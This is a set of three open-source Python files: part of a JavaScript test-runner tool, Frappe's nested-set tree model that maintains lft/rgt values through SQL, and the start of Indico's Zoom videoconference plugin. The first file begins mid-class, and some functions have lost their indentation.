self._validate_suite_name(self.suite_name())
# Compile exclude/include regular expressions
rules = self._desc_dict.get('include_in_page', [])
self._include_regex_list = [re.compile(r) for r in rules]
rules = self._desc_dict.get('exclude_from_page', [])
self._exclude_regex_list = [re.compile(r) for r in rules]
# Try to find all paths once, with warnings enabled
# This way, we print warnings for missing files to the
# console only one time.
self.lib_paths(enable_warnings=True)
self.spec_paths(enable_warnings=True)
self.src_paths(enable_warnings=True)
self.fixture_paths(enable_warnings=True)
def suite_name(self):
"""
Return the unique identifier for the test suite.
"""
return self._desc_dict.get('test_suite_name')
def root_dir(self):
"""
Return the root directory to which all paths in the suite
description are relative.
"""
return self._root_dir
def prepend_path(self):
"""
Return a user-defined path prepended to source file
paths in reports. May be an empty string.
"""
return self._desc_dict.get('prepend_path', '')
def lib_paths(self, only_in_page=False, enable_warnings=False):
"""
Return a list of paths to the dependency files needed by
the test suite.
If `only_in_page` is True, returns only the paths
that should be included in <script> tags on the
test runner page.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
If no dependencies were specified, returns an empty list.
Preserves the order of lib directories.
Raises a `SuiteDescriptionError` if a file or directory could not be found.
"""
if 'lib_paths' in self._desc_dict:
return self._js_paths(self._desc_dict['lib_paths'],
only_in_page,
enable_warnings)
else:
return []
def src_paths(self, only_in_page=False, enable_warnings=False):
"""
Return a list of paths to JavaScript source
files used by the test suite.
If `only_in_page` is True, returns only the paths
that should be included in <script> tags on the
test runner page.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
Preserves the order of source directories.
Raises a `SuiteDescriptionError` if a file or directory could not be found.
"""
return self._js_paths(self._desc_dict['src_paths'],
only_in_page,
enable_warnings)
def spec_paths(self, only_in_page=False, enable_warnings=False):
"""
Return a list of paths to JavaScript spec files used by the test suite.
If `only_in_page` is True, returns only the paths
that should be included in <script> tags on the
test runner page.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
Preserves the order of spec directories.
Raises a `SuiteDescriptionError` if a file or directory could not be found.
"""
return self._js_paths(self._desc_dict['spec_paths'],
only_in_page,
enable_warnings)
def fixture_paths(self, enable_warnings=False):
"""
Return a list of paths to fixture files used by the test suite.
These can be non-JavaScript files.
If `enable_warnings` is true, then log a warning whenever
we can't find a file we expect.
Raises a `SuiteDescriptionError` if a file or directory could not be found.
"""
if 'fixture_paths' in self._desc_dict:
return self._file_paths(self._desc_dict['fixture_paths'],
enable_warnings)
else:
return []
def requirejs_path_map(self):
    """
    Return the map of aliases to paths used by requirejs when loading files.

    Returns an empty dict when no "requirejs" section is present
    in the suite description.
    """
    desc = self._desc_dict
    if "requirejs" not in desc:
        return {}
    return desc["requirejs"].get("paths", {})
def requirejs_baseUrl(self):
    """
    Return a baseUrl to be appended onto the default requirejs baseUrl.

    Returns an empty string when no "requirejs" section is present
    in the suite description.
    """
    desc = self._desc_dict
    if "requirejs" not in desc:
        return ""
    return desc["requirejs"].get("baseUrl", "")
def test_runner(self):
    """
    Return the name of the test runner to use (e.g. "Jasmine")
    """
    # We validated data in the constructor,
    # so the key is guaranteed to exist
    return self._desc_dict['test_runner']
def _include_in_page(self, script_path):
    """
    Return True if and only if the script should be
    included in the test runner page using <script> tags.

    A script is included by default, UNLESS it matches an
    `exclude_from_page` regex in the YAML description AND does
    not match any `include_in_page` rule (include rules win).
    """
    def matches_any(regex_list):
        # True when at least one compiled regex matches the path.
        return any(regex.match(script_path) is not None
                   for regex in regex_list)

    # Explicit include rules take precedence over exclude rules.
    if matches_any(self._include_regex_list):
        return True
    if matches_any(self._exclude_regex_list):
        return False

    # Default is to include the script.
    return True
def _js_paths(self, path_list, only_in_page, enable_warnings):
    """
    Find *.js files in `path_list`. See `_file_paths` for
    more information.

    If `only_in_page` is True, filters the results for
    only JS files to be included in the test runner page
    <script> tags.

    If `enable_warnings` is true, then log a warning whenever
    we can't find a file we expect.
    """
    paths = self._file_paths(
        path_list, enable_warnings,
        include_func=self._is_js_file
    )
    if only_in_page:
        # NOTE(review): on Python 2 `filter` returns a list; on Python 3
        # it would return a lazy iterator. This module appears to target
        # Python 2 (see `unicode` usage below) -- confirm before porting.
        return filter(self._include_in_page, paths)
    else:
        return paths
def _file_paths(self, path_list,
                enable_warnings,
                include_func=lambda file_path: True):
    """
    Recursively search the directories in `path_list` for
    files that satisfy `include_func`.

    `path_list` is a list of file and directory paths.

    `include_func` is a function that accepts a `file_path` argument
    and returns a bool indicating whether to include the file.

    If `enable_warnings` is true, then log a warning whenever
    we can't find a file we expect.

    Returns the list of paths to each file it finds.
    These are relative paths to the root directory passed
    to the constructor.

    Within each directory in `path_list`, paths are sorted
    alphabetically. However, order of the root directories
    is preserved.

    The paths in the resulting list are guaranteed to be unique.

    Raises a `SuiteDescriptionError` if the directory could not be found.
    """
    # Create a list of paths to return
    # We use a list instead of a set, even though we
    # want paths to be unique, because we want
    # to preserve the dependency order the user
    # specified.
    result_paths = []

    for path in path_list:
        # We use the full path here so that we actually find
        # the files we're looking for
        full_path = os.path.join(self._root_dir, path)

        # If the path is a file and satisfies the include function
        # then add it to the list.
        if os.path.isfile(full_path):
            if include_func(full_path):
                result_paths.append(full_path)
            # This is a user-specified file, so we let the
            # user know that we are skipping the dependency.
            # NOTE(review): the message hard-codes '.js', but
            # `include_func` is generic -- misleading for non-JS filters.
            elif enable_warnings:
                msg = "Skipping '{}' because it does not have a '.js' extension".format(path)
                LOGGER.warning(msg)

        # If the path is a directory, recursively search for JS files
        elif os.path.isdir(full_path):
            # Store all paths within this root directory, so
            # we can sort them while preserving the order of
            # the root directories.
            inner_paths = []

            for root_dir, _, filenames in os.walk(full_path):
                # Look for files that satisfy the include func
                # NOTE(review): `include_func` is called on the bare
                # filename here, but on the full path in the file branch
                # above -- fine for extension checks, confirm otherwise.
                for name in filenames:
                    if include_func(name):
                        inner_paths.append(os.path.join(root_dir, name))

            # Sort the paths in this directory in alphabetical order
            # then add them to the final list.
            result_paths.extend(sorted(inner_paths, key=str.lower))

        # If it's neither a file nor a directory,
        # this is a user input error, so log it.
        elif enable_warnings:
            msg = "Could not find file or directory at '{}'".format(path)
            LOGGER.warning(msg)

    # Now that we've found the files we're looking for, we
    # want to return relative paths to our root
    # (for use in URLs)
    rel_paths = [os.path.relpath(path, self._root_dir)
                 for path in result_paths]

    # Remove duplicates, preserving the order
    return self._remove_duplicates(rel_paths)
@staticmethod
def _is_js_file(file_path):
"""
Returns True only if the file at `file_path` has a .js extension.
"""
_, ext = os.path.splitext(file_path)
return ext == '.js'
@staticmethod
def _remove_duplicates(path_list):
"""
Return a list of paths with duplicates removed,
preserving the order in `path_list`.
"""
already_found = []
result = []
for path in path_list:
if not path in already_found:
result.append(path)
already_found.append(path)
return result
@classmethod
def _validate_description(cls, desc_dict):
    """
    Validate that `desc_dict` (a `dict`) contains all the required data,
    raising a `SuiteDescriptionError` if any key is missing.

    Also normalizes multi-value keys to lists (mutates `desc_dict`
    in place) and checks the test runner name, relative paths,
    and the `prepend_path` type.
    """
    # Check that we have a dict
    # The YAML syntax makes it easy to specify
    # a list of dicts rather than a dict, which we expect.
    if not isinstance(desc_dict, dict):
        msg = dedent("""
            Suite description must be a dictionary.
            Check that your keys look like this:
            spec_paths:
                - spec
            and not like this:
            - spec_paths:
                - spec
            (note the initial - sign).""")
        raise SuiteDescriptionError(msg)

    # Expect that all required keys are present and non-empty
    for key in cls.REQUIRED_KEYS:
        # Checks for non-existent key, empty lists, and empty strings
        if not desc_dict.get(key, None):
            msg = "Missing required key '{}'".format(key)
            raise SuiteDescriptionError(msg)

    # Convert keys that can have multiple values to lists
    for key in ['lib_paths', 'src_paths',
                'spec_paths', 'fixture_paths',
                'include_in_page', 'exclude_from_page']:
        if key in desc_dict and not isinstance(desc_dict[key], list):
            desc_dict[key] = [desc_dict[key]]

    # Check that we are using a valid test runner
    test_runner = desc_dict['test_runner']
    if not test_runner in cls.TEST_RUNNERS:
        msg = "'{}' is not a supported test runner.".format(test_runner)
        raise SuiteDescriptionError(msg)

    # Check that we are not using double-dot relative paths
    for key in ['lib_paths', 'src_paths', 'spec_paths', 'fixture_paths']:
        if key in desc_dict and cls.path_list_has_double_dot(desc_dict[key]):
            msg = ("Paths cannot use up-level references (e.g. ../path/to/dir). " +
                   "Try using a symbolic link instead.")
            raise SuiteDescriptionError(msg)

    # Check that the prepend_path key is a string
    # NOTE(review): `unicode` exists only on Python 2 -- this module
    # appears to target Python 2; this line raises NameError on Python 3.
    prepend_path = desc_dict.get('prepend_path', '')
    if not (isinstance(prepend_path, str) or
            isinstance(prepend_path, unicode)):
        msg = "Prepend path must be a string."
        raise SuiteDescriptionError(msg)
@staticmethod
def _validate_suite_name(name):
    """
    Validate that the suite name is URL-encodable and does not contain
    any GET param characters, raising a `SuiteDescriptionError` otherwise.
    """
    # If quoting changes the name, the name contains characters
    # that are not URL-safe as-is.
    # NOTE(review): `urllib.quote` is Python 2 only
    # (Python 3 moved it to `urllib.parse.quote`).
    if urllib.quote(name) != name:
        msg = "'{}' must be URL-encoded.".format(name)
        raise SuiteDescriptionError(msg)

    # Also can't allow anything that will throw off
    # our path parsing (slashes)
    if '/' in name:
        msg = "'{}' cannot contain slashes".format(name)
        raise SuiteDescriptionError(msg)
@staticmethod
def _validate_root_dir(root_dir):
"""
Validate that the root directory exists and is a directory,
raising a `SuiteDescriptionError` if this is not the case.
"""
if not os.path.isdir(root_dir):
msg = "'{}' is not a valid directory".format(root_dir)
raise SuiteDescriptionError(msg)
@staticmethod
def path_list_has_double_dot(path_list):
"""
Return True if any path in `path_list` uses
an up-level reference (double dot).
"""
for path in path_list:
if '..' in path.split('/'):
return True
return False
class SuiteRendererError(Exception):
    """
    Raised when the test runner page could not be rendered
    for a given test suite description.
    """
    pass
class SuiteRenderer(object):
    """
    Render a test runner page for a test suite description.
    """

    # Dictionary mapping test runner names (e.g. 'jasmine') to
    # templates used to render the test runner page.
    TEMPLATE_DICT = {
        'jasmine': 'jasmine_test_runner.html',
        'jasmine_requirejs': 'jasmine_requirejs_test_runner.html',
    }

    # The CSS ID of the <div> that will contain the output test results
    RESULTS_DIV_ID = 'js_test_tool_results'

    # Expect the results page to have a <div>
    # with this ID to report JavaScript exceptions
    ERROR_DIV_ID = 'js_test_tool_error'

    def __init__(self, dev_mode=False):
        """
        If `dev_mode` is `True`, then display results in the browser
        in a human-readable form.
        """
        self._dev_mode = dev_mode

    def render_to_string(self, suite_name, suite_desc):
        """
        Given `suite_desc` (a suite description instance),
        render a test runner page. When loaded, this page will
        execute the JavaScript tests in the suite.

        `suite_name` is the unique name of the suite, used to generate
        links to that suite's dependencies.

        Returns a unicode string.

        Raises a `SuiteRendererError` if the page could not be rendered.
        """
        # Get the test runner template
        test_runner = suite_desc.test_runner()
        template_name = self.TEMPLATE_DICT.get(test_runner)

        # If we have no template for this name, raise an exception
        if template_name is None:
            msg = "No template defined for test runner '{}'".format(test_runner)
            raise SuiteRendererError(msg)

        # Create the context for the template
        template_context = {
            'suite_name': suite_name,
            'lib_path_list': suite_desc.lib_paths(only_in_page=True),
            'src_path_list': suite_desc.src_paths(only_in_page=True),
            'spec_path_list': suite_desc.spec_paths(only_in_page=True),
            'requirejs_path_map': suite_desc.requirejs_path_map(),
            'requirejs_baseUrl': suite_desc.requirejs_baseUrl(),
            'results_div_id': self.RESULTS_DIV_ID,
            'error_div_id': self.ERROR_DIV_ID,
            'dev_mode': self._dev_mode,
        }

        # Render the template
        try:
            html = self.render_template(template_name, template_context)
        # Broad catch is deliberate: any template failure is surfaced
        # to the caller as a SuiteRendererError.
        except Exception as ex:
            msg = "Error occurred while rendering test runner page: {}".format(ex)
            raise SuiteRendererError(msg)

        return html

    @staticmethod
    def render_template(template_name, context):
        """
        Render the Jinja2 template named `template_name` using `context`
        (a `dict`) and return the resulting unicode string.
        """
        # NOTE(review): TEMPLATE_ENV is presumably a module-level Jinja2
        # Environment defined outside this chunk -- not visible here.
        template = TEMPLATE_ENV.get_template(template_name)
        return template.render(context)
| |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Tree (Hierarchical) Nested Set Model (nsm)
#
# To use the nested set model,
# use the following pattern
# 1. name your parent field as "parent_item_group", or set a property nsm_parent_field with your field name in the document class
# 2. have a field called "old_parent" in your fields list - this identifies whether the parent has been changed
# 3. call update_nsm(doc_obj) in the on_update method
# ------------------------------------------
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.document import Document
from frappe.utils import now
# Raised when a node would become a descendant of itself (tree loop).
class NestedSetRecursionError(frappe.ValidationError): pass
# Raised when a second root node is created but only one is allowed.
class NestedSetMultipleRootsError(frappe.ValidationError): pass
# Raised when deleting a node that still has child nodes.
class NestedSetChildExistsError(frappe.ValidationError): pass
# Raised when merging nodes of incompatible kinds (group vs. leaf).
class NestedSetInvalidMergeError(frappe.ValidationError): pass
# called in the on_update method
def update_nsm(doc):
    """
    Maintain the nested-set (lft/rgt) columns for `doc`.

    Called from a DocType's on_update hook. Inserts the node if it has
    no lft/rgt yet, moves it if its parent changed, then persists the
    new "old parent" value and reloads the document.
    """
    # get fields, data from the DocType
    opf = 'old_parent'
    pf = "parent_" + frappe.scrub(doc.doctype)

    # Allow DocTypes to override the parent / old-parent field names.
    if hasattr(doc, 'nsm_parent_field'):
        pf = doc.nsm_parent_field
    if hasattr(doc, 'nsm_oldparent_field'):
        opf = doc.nsm_oldparent_field

    p, op = doc.get(pf) or None, doc.get(opf) or None

    # has parent changed (?) or parent is None (root)
    if not doc.lft and not doc.rgt:
        # brand new node: no interval assigned yet
        update_add_node(doc, p or '', pf)
    elif op != p:
        # parent changed: relocate the whole subtree
        update_move_node(doc, pf)

    # set old parent
    doc.set(opf, p)
    frappe.db.set_value(doc.doctype, doc.name, opf, p or '', update_modified=False)

    # refresh in-memory values (lft/rgt were changed via raw SQL)
    doc.reload()
def update_add_node(doc, parent, parent_field):
    """
    Insert a new node into the nested-set tree.

    Makes room by shifting all lft/rgt values >= the insertion point
    by 2, then assigns the new node's interval. Returns the new lft.
    """
    n = now()

    doctype = doc.doctype
    name = doc.name

    # get the last sibling of the parent
    if parent:
        # insert at the parent's rgt (i.e. as the last child)
        left, right = frappe.db.sql("select lft, rgt from `tab{0}` where name=%s"
            .format(doctype), parent)[0]
        validate_loop(doc.doctype, doc.name, left, right)
    else:  # root
        # next free slot after the right-most existing root
        right = frappe.db.sql("""
            SELECT COALESCE(MAX(rgt), 0) + 1 FROM `tab{0}`
            WHERE COALESCE(`{1}`, '') = ''
            """.format(doctype, parent_field))[0][0]
    # NOTE(review): position of this fallback was reconstructed from a
    # whitespace-mangled source -- confirm against upstream.
    right = right or 1

    # update all on the right
    frappe.db.sql("update `tab{0}` set rgt = rgt+2, modified=%s where rgt >= %s"
        .format(doctype), (n, right))
    frappe.db.sql("update `tab{0}` set lft = lft+2, modified=%s where lft >= %s"
        .format(doctype), (n, right))

    # update index of new node
    if frappe.db.sql("select * from `tab{0}` where lft=%s or rgt=%s".format(doctype), (right, right+1)):
        # the slot should be free after the shifts above
        frappe.msgprint(_("Nested set error. Please contact the Administrator."))
        raise Exception

    frappe.db.sql("update `tab{0}` set lft=%s, rgt=%s, modified=%s where name=%s".format(doctype),
        (right, right+1, n, name))
    return right
def update_move_node(doc, parent_field):
    """
    Relocate an existing node (and its whole subtree) under its new
    parent -- or make it a new root when the parent field is empty.

    Works by temporarily negating the subtree's lft/rgt values so the
    interval shifts below do not touch it, closing the gap at the old
    position, opening a gap at the new position, and finally restoring
    the subtree with the appropriate offset.
    """
    n = now()
    parent = doc.get(parent_field)

    if parent:
        new_parent = frappe.db.sql("""select lft, rgt from `tab{0}`
            where name = %s""".format(doc.doctype), parent, as_dict=1)[0]

        validate_loop(doc.doctype, doc.name, new_parent.lft, new_parent.rgt)

    # move to dark side: negate the subtree's interval so it is
    # unaffected by the shifts below (restored at the end via lft < 0)
    frappe.db.sql("""update `tab{0}` set lft = -lft, rgt = -rgt, modified=%s
        where lft >= %s and rgt <= %s""".format(doc.doctype), (n, doc.lft, doc.rgt))

    # shift left
    diff = doc.rgt - doc.lft + 1
    frappe.db.sql("""update `tab{0}` set lft = lft -%s, rgt = rgt - %s, modified=%s
        where lft > %s""".format(doc.doctype), (diff, diff, n, doc.rgt))

    # shift left rgts of ancestors whose only rgts must shift
    frappe.db.sql("""update `tab{0}` set rgt = rgt - %s, modified=%s
        where lft < %s and rgt > %s""".format(doc.doctype), (diff, n, doc.lft, doc.rgt))

    if parent:
        # re-read the parent: its interval may have shifted above.
        # NOTE(review): this query uses %-interpolation for the table
        # name, unlike the .format style used everywhere else.
        new_parent = frappe.db.sql("""select lft, rgt from `tab%s`
            where name = %s""" % (doc.doctype, '%s'), parent, as_dict=1)[0]

        # set parent lft, rgt
        frappe.db.sql("""update `tab{0}` set rgt = rgt + %s, modified=%s
            where name = %s""".format(doc.doctype), (diff, n, parent))

        # shift right at new parent
        frappe.db.sql("""update `tab{0}` set lft = lft + %s, rgt = rgt + %s, modified=%s
            where lft > %s""".format(doc.doctype), (diff, diff, n, new_parent.rgt))

        # shift right rgts of ancestors whose only rgts must shift
        frappe.db.sql("""update `tab{0}` set rgt = rgt + %s, modified=%s
            where lft < %s and rgt > %s""".format(doc.doctype),
            (diff, n, new_parent.lft, new_parent.rgt))

        new_diff = new_parent.rgt - doc.lft
    else:
        # new root: append after the current right-most node
        max_rgt = frappe.db.sql("""select max(rgt) from `tab{0}`""".format(doc.doctype))[0][0]
        new_diff = max_rgt + 1 - doc.lft

    # bring back from dark side
    frappe.db.sql("""update `tab{0}` set lft = -lft + %s, rgt = -rgt + %s, modified=%s
        where lft < 0""".format(doc.doctype), (new_diff, new_diff, n))
def rebuild_tree(doctype, parent_field):
    """
    Rebuild the lft/rgt values for the whole tree by calling
    `rebuild_node` for every root node, in name order.
    """
    # get all roots
    frappe.db.auto_commit_on_many_writes = 1
    right = 1
    # NOTE(review): doctype/parent_field are %-interpolated into the SQL;
    # both come from DocType metadata, not user input -- confirm callers.
    result = frappe.db.sql("SELECT name FROM `tab%s` WHERE `%s`='' or `%s` IS NULL ORDER BY name ASC" % (doctype, parent_field, parent_field))
    for r in result:
        # each root continues numbering where the previous one ended
        right = rebuild_node(doctype, r[0], right, parent_field)

    frappe.db.auto_commit_on_many_writes = 0
def rebuild_node(doctype, parent, left, parent_field):
    """
    Reset lft/rgt for the node `parent` (assigning `left` as its lft)
    and recurse into all of its children.

    Returns the next free index (this node's rgt + 1).
    """
    from frappe.utils import now
    n = now()

    # the right value of this node is the left value + 1
    right = left + 1

    # get all children of this node
    result = frappe.db.sql("SELECT name FROM `tab{0}` WHERE `{1}`=%s"
        .format(doctype, parent_field), (parent))
    for r in result:
        right = rebuild_node(doctype, r[0], right, parent_field)

    # we've got the left value, and now that we've processed
    # the children of this node we also know the right value
    frappe.db.sql("""UPDATE `tab{0}` SET lft=%s, rgt=%s, modified=%s
        WHERE name=%s""".format(doctype), (left, right, n, parent))

    # return the right value of this node + 1
    return right + 1
def validate_loop(doctype, name, lft, rgt):
    """
    Throw `NestedSetRecursionError` if `name` is an ancestor of the
    interval (lft, rgt) -- i.e. the move would create a loop.
    """
    # ancestors are exactly the rows whose interval encloses (lft, rgt)
    if name in frappe.db.sql_list("""select name from `tab{0}` where lft <= %s and rgt >= %s"""
        .format(doctype), (lft, rgt)):
        frappe.throw(_("Item cannot be added to its own descendents"), NestedSetRecursionError)
class NestedSet(Document):
    """Base Document class for DocTypes stored as a nested-set tree."""

    def __setup__(self):
        # Pick up a custom parent field name from the DocType meta, if set.
        if self.meta.get("nsm_parent_field"):
            self.nsm_parent_field = self.meta.nsm_parent_field

    def on_update(self):
        # Keep lft/rgt in sync and ensure leaf/group consistency.
        update_nsm(self)
        self.validate_ledger()

    def on_trash(self, allow_root_deletion=False):
        """Detach the node from the tree before deletion."""
        if not getattr(self, 'nsm_parent_field', None):
            self.nsm_parent_field = frappe.scrub(self.doctype) + "_parent"

        parent = self.get(self.nsm_parent_field)
        if not parent and not allow_root_deletion:
            frappe.throw(_("Root {0} cannot be deleted").format(_(self.doctype)))

        # cannot delete non-empty group
        self.validate_if_child_exists()

        self.set(self.nsm_parent_field, "")

        try:
            update_nsm(self)
        except frappe.DoesNotExistError:
            if self.flags.on_rollback:
                # best-effort during rollback: drop the error message
                pass
                frappe.message_log.pop()
            else:
                raise

    def validate_if_child_exists(self):
        # Throw if any row still points at this node as its parent.
        has_children = frappe.db.sql("""select count(name) from `tab{doctype}`
            where `{nsm_parent_field}`=%s""".format(doctype=self.doctype, nsm_parent_field=self.nsm_parent_field),
            (self.name,))[0][0]
        if has_children:
            frappe.throw(_("Cannot delete {0} as it has child nodes").format(self.name), NestedSetChildExistsError)

    def before_rename(self, olddn, newdn, merge=False, group_fname="is_group"):
        # Merging is only allowed between nodes of the same kind.
        if merge and hasattr(self, group_fname):
            is_group = frappe.db.get_value(self.doctype, newdn, group_fname)
            if self.get(group_fname) != is_group:
                frappe.throw(_("Merging is only possible between Group-to-Group or Leaf Node-to-Leaf Node"), NestedSetInvalidMergeError)

    def after_rename(self, olddn, newdn, merge=False):
        if not self.nsm_parent_field:
            parent_field = "parent_" + self.doctype.replace(" ", "_").lower()
        else:
            parent_field = self.nsm_parent_field

        # set old_parent for children
        frappe.db.sql("update `tab{0}` set old_parent=%s where {1}=%s"
            .format(self.doctype, parent_field), (newdn, newdn))

        if merge:
            # renamed-into node absorbed children; recompute lft/rgt
            rebuild_tree(self.doctype, parent_field)

    def validate_one_root(self):
        # Only applies to nodes without a parent (i.e. roots).
        if not self.get(self.nsm_parent_field):
            if self.get_root_node_count() > 1:
                frappe.throw(_("""Multiple root nodes not allowed."""), NestedSetMultipleRootsError)

    def get_root_node_count(self):
        # Roots are rows whose parent field is empty.
        return frappe.db.count(self.doctype, {
            self.nsm_parent_field: ''
        })

    def validate_ledger(self, group_identifier="is_group"):
        # A non-group ("ledger"/leaf) node must not have children.
        if hasattr(self, group_identifier) and not bool(self.get(group_identifier)):
            if frappe.db.sql("""select name from `tab{0}` where {1}=%s and docstatus!=2"""
                .format(self.doctype, self.nsm_parent_field), (self.name)):
                frappe.throw(_("{0} {1} cannot be a leaf node as it has children").format(_(self.doctype), self.name))

    def get_ancestors(self):
        return get_ancestors_of(self.doctype, self.name)
def get_root_of(doctype):
    """Get root element of a DocType with a tree structure"""
    # A root is a node with no enclosing interval (no ancestors)
    # and a valid interval of its own (rgt > lft).
    result = frappe.db.sql("""select t1.name from `tab{0}` t1 where
        (select count(*) from `tab{1}` t2 where
            t2.lft < t1.lft and t2.rgt > t1.rgt) = 0
        and t1.rgt > t1.lft""".format(doctype, doctype))
    return result[0][0] if result else None
def get_ancestors_of(doctype, name, order_by="lft desc", limit=None):
    """Get ancestor elements of a DocType with a tree structure"""
    lft, rgt = frappe.db.get_value(doctype, name, ["lft", "rgt"])
    # Ancestors are exactly the nodes whose interval strictly
    # encloses this node's (lft, rgt).
    result = [d["name"] for d in frappe.db.get_all(doctype, {"lft": ["<", lft], "rgt": [">", rgt]},
        "name", order_by=order_by, limit_page_length=limit)]
    return result or []
def get_descendants_of(doctype, name, order_by="lft desc", limit=None,
        ignore_permissions=False):
    '''Return descendants of the current record'''
    lft, rgt = frappe.db.get_value(doctype, name, ['lft', 'rgt'])
    # Descendants are exactly the nodes whose interval lies strictly
    # inside this node's (lft, rgt). Uses get_list (permission-aware)
    # unlike get_ancestors_of, which uses get_all.
    result = [d["name"] for d in frappe.db.get_list(doctype, {"lft": [">", lft], "rgt": ["<", rgt]},
        "name", order_by=order_by, limit_page_length=limit, ignore_permissions=ignore_permissions)]
    return result or []
| |
# This file is part of the Indico plugins.
# Copyright (C) 2020 - 2021 CERN and ENEA
#
# The Indico plugins are free software; you can redistribute
# them and/or modify them under the terms of the MIT License;
# see the LICENSE file for more details.
from flask import flash, has_request_context, request, session
from markupsafe import escape
from requests.exceptions import HTTPError
from sqlalchemy.orm.attributes import flag_modified
from wtforms.fields import TextAreaField
from wtforms.fields.core import BooleanField
from wtforms.fields.html5 import URLField
from wtforms.fields.simple import StringField
from wtforms.validators import URL, DataRequired, Optional, ValidationError
from indico.core import signals
from indico.core.auth import multipass
from indico.core.errors import UserValueError
from indico.core.plugins import IndicoPlugin, render_plugin_template, url_for_plugin
from indico.modules.events.views import WPSimpleEventDisplay
from indico.modules.vc import VCPluginMixin, VCPluginSettingsFormBase
from indico.modules.vc.exceptions import VCRoomError, VCRoomNotFoundError
from indico.modules.vc.models.vc_rooms import VCRoom, VCRoomStatus
from indico.modules.vc.views import WPVCEventPage, WPVCManageEvent
from indico.util.user import principal_from_identifier
from indico.web.forms.fields import IndicoEnumSelectField, IndicoPasswordField, TextListField
from indico.web.forms.validators import HiddenUnless
from indico.web.forms.widgets import CKEditorWidget, SwitchWidget
from indico_vc_zoom import _
from indico_vc_zoom.api import ZoomIndicoClient
from indico_vc_zoom.blueprint import blueprint
from indico_vc_zoom.cli import cli
from indico_vc_zoom.forms import VCRoomAttachForm, VCRoomForm
from indico_vc_zoom.notifications import notify_host_start_url
from indico_vc_zoom.util import (UserLookupMode, ZoomMeetingType, fetch_zoom_meeting, find_enterprise_email,
gen_random_password, get_alt_host_emails, get_schedule_args, get_url_data_args,
process_alternative_hosts, update_zoom_meeting)
class PluginSettingsForm(VCPluginSettingsFormBase):
    """Admin settings form for the Zoom VC plugin."""

    # Grouping of the fields below into titled fieldsets on the settings page.
    _fieldsets = [
        (_('API Credentials'), ['api_key', 'api_secret', 'webhook_token']),
        (_('Zoom Account'), ['user_lookup_mode', 'email_domains', 'authenticators', 'enterprise_domain',
                             'allow_webinars', 'phone_link']),
        (_('Room Settings'), ['mute_audio', 'mute_host_video', 'mute_participant_video', 'join_before_host',
                              'waiting_room']),
        (_('Notifications'), ['creation_email_footer', 'send_host_url', 'notification_emails']),
        (_('Access'), ['managers', 'acl'])
    ]

    api_key = StringField(_('API Key'), [DataRequired()])

    api_secret = IndicoPasswordField(_('API Secret'), [DataRequired()], toggle=True)

    webhook_token = IndicoPasswordField(_('Webhook Token'), toggle=True,
                                        description=_("Specify Zoom's webhook token if you want live updates"))

    user_lookup_mode = IndicoEnumSelectField(_('User lookup mode'), [DataRequired()], enum=UserLookupMode,
                                             description=_('Specify how Indico should look up the zoom user that '
                                                           'corresponds to an Indico user.'))

    # Only shown/required when user_lookup_mode == email_domains.
    email_domains = TextListField(_('E-mail domains'),
                                  [HiddenUnless('user_lookup_mode', UserLookupMode.email_domains), DataRequired()],
                                  description=_('List of e-mail domains which can use the Zoom API. Indico attempts '
                                                'to find Zoom accounts using all email addresses of a user which use '
                                                'those domains.'))

    # Only shown/required when user_lookup_mode == authenticators.
    authenticators = TextListField(_('Indico identity providers'),
                                   [HiddenUnless('user_lookup_mode', UserLookupMode.authenticators), DataRequired()],
                                   description=_('Identity providers from which to get usernames. '
                                                 'Indico queries those providers using the email addresses of the user '
                                                 'and attempts to find Zoom accounts having an email address with the '
                                                 'format username@enterprise-domain.'))

    enterprise_domain = StringField(_('Enterprise domain'),
                                    [HiddenUnless('user_lookup_mode', UserLookupMode.authenticators), DataRequired()],
                                    description=_('The domain name used together with the usernames from the Indico '
                                                  'identity provider'))

    allow_webinars = BooleanField(_('Allow Webinars (Experimental)'),
                                  widget=SwitchWidget(),
                                  description=_('Allow webinars to be created through Indico. Use at your own risk.'))

    mute_audio = BooleanField(_('Mute audio'),
                              widget=SwitchWidget(),
                              description=_('Participants will join the VC room muted by default '))

    mute_host_video = BooleanField(_('Mute video (host)'),
                                   widget=SwitchWidget(),
                                   description=_('The host will join the VC room with video disabled'))

    mute_participant_video = BooleanField(_('Mute video (participants)'),
                                          widget=SwitchWidget(),
                                          description=_('Participants will join the VC room with video disabled'))

    join_before_host = BooleanField(_('Join Before Host'),
                                    widget=SwitchWidget(),
                                    description=_('Allow participants to join the meeting before the host starts the '
                                                  'meeting. Only used for scheduled or recurring meetings.'))

    waiting_room = BooleanField(_('Waiting room'),
                                widget=SwitchWidget(),
                                description=_('Participants may be kept in a waiting room by the host'))

    creation_email_footer = TextAreaField(_('Creation email footer'), widget=CKEditorWidget(),
                                          description=_('Footer to append to emails sent upon creation of a VC room'))

    send_host_url = BooleanField(_('Send host URL'),
                                 widget=SwitchWidget(),
                                 description=_('Whether to send an e-mail with the Host URL to the meeting host upon '
                                               'creation of a meeting'))

    phone_link = URLField(_('Join via phone'), [Optional(), URL()],
                          description=_('Link to the list of VidyoVoice phone numbers'))

    def validate_authenticators(self, field):
        """Reject identity provider names not configured in multipass."""
        invalid = set(field.data) - set(multipass.identity_providers)
        if invalid:
            raise ValidationError(_('Invalid identity providers: {}').format(escape(', '.join(invalid))))
class ZoomPlugin(VCPluginMixin, IndicoPlugin):
"""Zoom
Zoom Plugin for Indico."""
# Plugin is configurable through the admin settings UI.
configurable = True
settings_form = PluginSettingsForm
vc_room_form = VCRoomForm
vc_room_attach_form = VCRoomAttachForm
friendly_name = 'Zoom'

# Defaults for the plugin settings; extends the base VC plugin defaults.
default_settings = dict(VCPluginMixin.default_settings, **{
    'api_key': '',
    'api_secret': '',
    'webhook_token': '',
    'user_lookup_mode': UserLookupMode.email_domains,
    'email_domains': [],
    'authenticators': [],
    'enterprise_domain': '',
    'allow_webinars': False,
    'mute_host_video': True,
    'mute_audio': True,
    'mute_participant_video': True,
    'join_before_host': True,
    'waiting_room': False,
    'creation_email_footer': None,
    'send_host_url': False,
    'phone_link': '',
})
def init(self):
    """Register signal handlers, the template hook and JS bundles."""
    super().init()
    self.connect(signals.plugin.cli, self._extend_indico_cli)
    self.connect(signals.event.times_changed, self._times_changed)
    self.connect(signals.event.metadata_postprocess, self._event_metadata_postprocess)
